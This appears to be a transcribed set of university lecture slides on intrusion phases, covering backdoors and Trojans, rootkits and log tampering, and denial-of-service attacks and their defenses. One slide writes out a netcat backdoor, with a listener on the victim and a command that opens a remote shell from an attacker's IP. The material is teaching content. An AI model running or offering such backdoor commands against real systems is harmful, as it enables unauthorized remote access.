460 likes | 553 Views
Summary From the Last Lecture. Intrusions (vulnerability, exploit) Intrusion phases Reconnaissance (non-technical, technical) Interrogating DNS, split-horizon DNS Scanning Learn about live machines, open ports, firewall rules, network topology, OSes , vulnerabilities NATs Firewalls
E N D
Summary From the Last Lecture • Intrusions (vulnerability, exploit) • Intrusion phases • Reconnaissance (non-technical, technical) • Interrogating DNS, split-horizon DNS • Scanning • Learn about live machines, open ports, firewall rules, network topology, OSes, vulnerabilities • NATs • Firewalls • Gaining access • Buffer overflow attacks • Sniffing • ARP poisoning, DNS poisoning • Spoofing TCP sessions
Announcements • Midterm in two weeks • Midterm review next week • We will go over two sample midterms, posted on class Web page • Bring any questions you may have • Reading list posted on the class Web page
Firewall Types • Packet (stateless) firewall • Rules speak about IP/TCP header fields • No connection state kept • E.g. drop all traffic with TCP SYN and src IP from the outside • Statefull firewall • Connection state is kept • E.g. drop all traffic except TCP ACK on established TCP connections • Proxy firewall • Act as a middleman to every connection, i.e. act as the destination and the source for every connection. • Can normalize protocols, reset TTL fields, etc.
Phase 4: Maintaining Access • Attacker establishes a listening application on a port (backdoor) so he can log on any time with or without a password • Attackers frequently close security holes they find to stop others from taking over their compromised machines
Netcat Tool • Similar to Linux cat command • http://netcat.sourceforge.net/ • Client: Initiates connection to any port on remote machine • Server: Listens on any port • To open a shell on a victim machine On victim machine: nc –l –p 1234 /* This opens a backdoor */ On attacker machine: nc 123.32.34.54 1234 –c /bin/sh /* This enters through a backdoor, opens a shell */ Dangerous
Netcat Tool • Used for • Port scanning • Backdoor • Relaying the attack (stepping stones)
Trojans • Application that claims to do one thing (and looks like it) but it also does something malicious • Users download Trojans from Internet (thinking they are downloading a free game) or get them as greeting cards in E-mail, or as ActiveX controls when they visit a Web site • Trojans can scramble your machine • They can also open a backdoor on your system, steal data, misuse your machine, etc. • They will report successful infection to the attacker
Back Orifice Dangerous • Trojan application that can • Log keystrokes • Steal passwords • Create dialog boxes • Mess with files, processes or system (registry) • Redirect packets • Set up backdoors • Take over screen and keyboard • http://www.bo2k.com/
Trojan Defenses • Antivirus software • Don’t download suspicious software • Check MD5 sum on trusted software you download • Disable automatic execution of attachments
At the End of Maintaining Access • The attacker has opened a backdoor and can now access victim machine at any time
Phase 5: Covering Tracks • Rootkits • Alter logs • Create hard-to-spot files • Use covert channels
Application Rootkits • Alter or replace system components (for instance DLLs) • E.g., on Linux attacker replaces ls program • Rootkits frequently come together with sniffers: • Capture a few characters of all sessions on the Ethernet and write into a file to steal passwords • Administrator would notice an interface in promiscuous mode • Not if attacker modifies an application that shows interfaces - netstat
Application Rootkits • Attacker will modify all key system applications that could reveal his presence • List processes e.g. ps • List files e.g. ls • Show open ports e.g. netstat • Show system utilization e.g. top • He will also substitute modification date with the one in the past
Defenses Against App. Rootkits • Don’t let attackers gain root access • Use integrity checking of files: • Carry a CD with md5sum, check hashes of system files against hashes advertised on vendor site or hashes you stored before • Use Tripwire • Free integrity checker that saves md5 sums of all important files in a secure database (read only CD), then verifies them periodically • http://www.tripwire.org/
Kernel Rootkits • Replace system calls • Intercept calls to open one application with calls to open another, of attacker’s choosing • Now even checksums don’t help as attacker did not modify any system applications • You won’t even see attacker’s files in file listing • You won’t see some processes or open ports • Usually installed as kernel modules • Defenses: disable kernel modules
Altering Logs • Attackers can: • Stop logging services • Load files into memory, change them • Restart logging service • Or simply change log file through scripts • Change login and event logs, command history file, last login data
Defenses Against Altering Logs • Use separate log servers • Machines will send their log messages to these servers • Encrypt log files • Make log files append only • Save logs on write-once media
Creating Hard-to-Spot Files • Names could look like system file names, but slightly changed • Start with . • Start with . and add spaces • Make files hidden • Defenses: intrusion detection systems and caution
Denial of Service Attacks • Unlike other forms of computer attacks, goal isn’t access or theft of information or services • The goal is to stop the service from operating • To deny service to legitimate users • Slowing down may be good enough • This is usually a temporary effect that passes as soon as the attack stops
How Can a Service Be Denied? • Lots of ways • Crash the machine • Or put it into an infinite loop • Crash routers on the path to the machine • Use up a key machine resource • Use up a key network resource • Deny another service needed for this one (DNS) • Using up resources is the most common approach
High-level Attack Categorization • Floods • Congestion control exploits • Unexpected header values • Invalid content • Invalid fragments • Large packets • Impersonation attacks
Simple Denial of Service • One machine tries to bring down another machine • There is a fundamental problem for the attacker: • The attack machine must be “more powerful” than the target machine to overload it OR • Attacker uses approaches other than flooding • The target machine might be a powerful server
Denial of Service and Asymmetry • Sometimes generating a request is cheaper than formulating a response e.g. sending a bogus packet is cheaper than decrypting this packet and checking that it’s bogus • If so, one attack machine can generate a lot of requests, and effectively multiply its power • Not always possible to achieve this asymmetry • This is called amplification effect
DDoS “Solves” That Problem • Use multiple machines to generate the workload • For any server of fixed power, enough attack machines working together can overload it • Enlist lots of machines and coordinate their attack on a single machine
Is DDoS a Real Problem? • Yes, attacks happen every day • One study reported ~4,000 per week1 • On a wide variety of targets • Tend to be highly successful • There are very few mechanisms that can stop certain attacks • There have been successful attacks on major commercial sites 1”Inferring Internet Denial of Service Activity,” Moore, Voelker, and Savage, Usenix Security Symposium, 2002
DDoS on Twitter • August 2009, hours-long service outage • 44 million users affected • At the same time Facebook, LiveJournal, YouTube and Blogger were under attack • Only some users experienced an outage • Real target: a Georgian blogger Image borrowed from Wired.comarticle. Originallyprovided by ArborNetworks
DDoS on Mastercard and Visa • December 2010 • Parts of services went down briefly • Attack launched by a group of vigilantes called Anonymous • Bots recruited through social engineering • Directed to download DDoS software and take instructions from a master • Motivation: Payback to services that cut their support of WikiLeaks after their founder was arrested on unrelated charges • Several other services affected
Potential Effects of DDoS Attacks • Most (if not all) sites could be rendered non-operational • The Internet could be largely flooded with garbage traffic • Essentially, the Internet could grind to a halt • In the face of a very large attack • Almost any site could be put out of business • With a moderate sized attack
Who Is Vulnerable? • Everyone connected to the Internet can be attacked • Everyone who uses Internet for crucial operations can suffer damages
But My Machines Are Well Secured! Doesn’t matter! The problem isn’t your vulnerability, it’s everyone elses’
But I Have a Firewall! Either the attacker slips his traffic into legitimate traffic Doesn’t matter! Or he attacks the firewall
But I Use a VPN! Doesn’t matter! The attacker can fill your tunnel with garbage Sure, you’ll detect it and discard it . . . But you’ll be so busy doing so that you’ll have no time for your real work
But I’m Heavily Provisioned Doesn’t matter! The attacker can probably get enough resources to overcome any level of resources you buy
Attack Toolkits • Widely available on the net • Easily downloaded along with source code • Easily deployed and used • Automated code for: • Scanning – detection of vulnerable machines • Exploit – breaking into the machine • Infection – placing the attack code • Rootkits • Hide the attack code • Restart the attack code • Keep open backdoors for attacker access • DDoS attack code
DDoS Attack Code • Attacker can customize: • Type of attack • UDP flood, ICMP flood, TCP SYN flood, Smurf attack (broadcast ping flood) • Web server request flood, authentication request flood, DNS flood • Victim IP address • Duration • Packet size • Source IP spoofing • Dynamics (constant rate or pulsing) • Communication between master and slaves
Implications Of Attack Toolkits • You don’t need much knowledge or great skills to perpetrate DDoS • Toolkits allow unsophisticated users to become DDoS perpetrators in little time • DDoS is, unfortunately, a game anyone can play
DDoS Attack Trends • Attackers follow defense approaches, adjust their code to bypass defenses • Use of subnet spoofing defeats ingress filtering • Use of encryption and decoy packets, IRC or P2P obscures master-slave communication • Encryption of attack packets defeats traffic analysis and signature detection • Pulsing attacks defeat slow defenses and traceback • Flash-crowd attacks generate legitimate (well-formed) application traffic
Implications For the Future • If we solve simple attacks, DDoS perpetrators will move on to more complex attacks • Recently seen trends: • Larger networks of attack machines • Rolling attacks from large number of machines • Attacks at higher semantic levels • Attacks on different types of network entities • Attacks on DDoS defense mechanisms • Need flexible defenses that evolve with attacks
How Come We Have DDoS? • Natural consequence of the way Internet is organized • Best effort service means routers don’t do much processing per packet and store no state – they will let anything through • End to end paradigm means routers will enforce no security or authentication – they will let anything through • It works real well when both parties play fair • It creates opportunity for DDoS when one party cheats
There Are Still No Strong Defenses Against DDoS • You can make yourself harder to attack • But you can’t make it impossible • And, if you haven’t made it hard enough, there’s not much you can do when you are attacked • There are no patches to apply • There is no switch to turn • There might be no filtering rule to apply • Grin and bear it